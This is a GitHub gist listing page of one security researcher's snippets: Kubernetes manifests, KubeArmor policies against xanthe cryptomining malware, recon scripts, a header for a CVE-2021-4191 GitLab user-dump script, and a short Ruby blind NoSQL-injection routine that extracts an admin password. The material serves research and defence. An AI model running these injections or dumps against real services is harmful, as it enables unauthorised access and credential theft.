Skip to content

Instantly share code, notes, and snippets.

View nandakrr's full-sized avatar

Nanda_Kumar nandakrr

11 followers · 120 following
View GitHub Profile
@nandakrr
nandakrr / tinyfilemanager.yaml
Created March 1, 2023 05:44
apiVersion: apps/v1
kind: Deployment
metadata:
name: tinyfilemanager
labels:
app: tinyfilemanager
spec:
selector:
matchLabels:
app: tinyfilemanager
@nandakrr
nandakrr / CVE-2021-4191.py
Created May 31, 2022 11:02
###
# Dumps GitLab's user base to CSV form.
#
# Requires GraphqlClient: pip install python-graphql-client
###
from python_graphql_client import GraphqlClient
import json
import sys
import argparse
@nandakrr
nandakrr / xanthe-dependency.sh
Last active February 24, 2022 16:26
apt update
apt -y upgrade
apt install -y sudo nano wget unzip make gcc curl gawk python ufw net-tools default-jre ca-certificates gnupg lsb-release iptables-persistent
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get install -y docker-ce docker-ce-cli containerd.io
cd /var/tmp
@nandakrr
nandakrr / ksp-xanthe-malware.yaml
Created February 11, 2022 03:46
# KubeArmor is an open source software that enables you to protect your cloud workload at run-time.
# To learn more about KubeArmor visit:
# https://www.accuknox.com/kubearmor
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-xanthe-malware
spec:
tags: ["xanthe", "abcbot", "cryptomining"]
@nandakrr
nandakrr / ksp-zend-conf-block.yaml
Created February 9, 2022 08:54
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-zend-conf-block
spec:
message: Permission denied
tags : ["config","exposure","zend","php"]
selector:
matchLabels:
app: zend
@nandakrr
nandakrr / ubuntu.yaml
Created February 9, 2022 08:51
apiVersion: apps/v1
kind: Deployment
metadata:
creationTimestamp: null
labels:
app: ubuntu
name: ubuntu
spec:
replicas: 1
selector:
@nandakrr
nandakrr / coldfusion_deployment.yaml
Created February 7, 2022 16:03
apiVersion: apps/v1
kind: Deployment
metadata:
name: coldfusion
labels:
app: coldfusion
spec:
selector:
matchLabels:
app: coldfusion
@nandakrr
nandakrr / injection.rb
Created October 30, 2021 15:09
require 'httparty'
URL="--url-here--"
def check?(str)
resp = HTTParty.get("http://#{URL}/?search=admin%27%20%26%26%20this.password.match(/#{str}/)%00")
return resp.body =~ />admin</
end
#puts check?("d").inspect
@nandakrr
nandakrr / auto.sh
Last active January 22, 2021 13:23
Combination of Multiple Tools to Automate Recon Process
#Combination of Multiple Tools for Personal Use by @nk1202 .
#!/bin/bash
url=$1
if [ ! -d "output/$url" ];then
mkdir output/$url
fi
if [ ! -d "output/$url/recon" ];then
@nandakrr
nandakrr / sub.sh
Last active April 5, 2023 05:43
Combination of Subdomain Enumeration Tools
#Combinination of Subdomain Enumeration Tools for Personal Use by @nk1202 .
#!/bin/bash
url=$1
if [ ! -d "output/$url" ];then
mkdir output/$url
fi
if [ ! -d "output/$url/recon" ];then
mkdir output/$url/recon
fi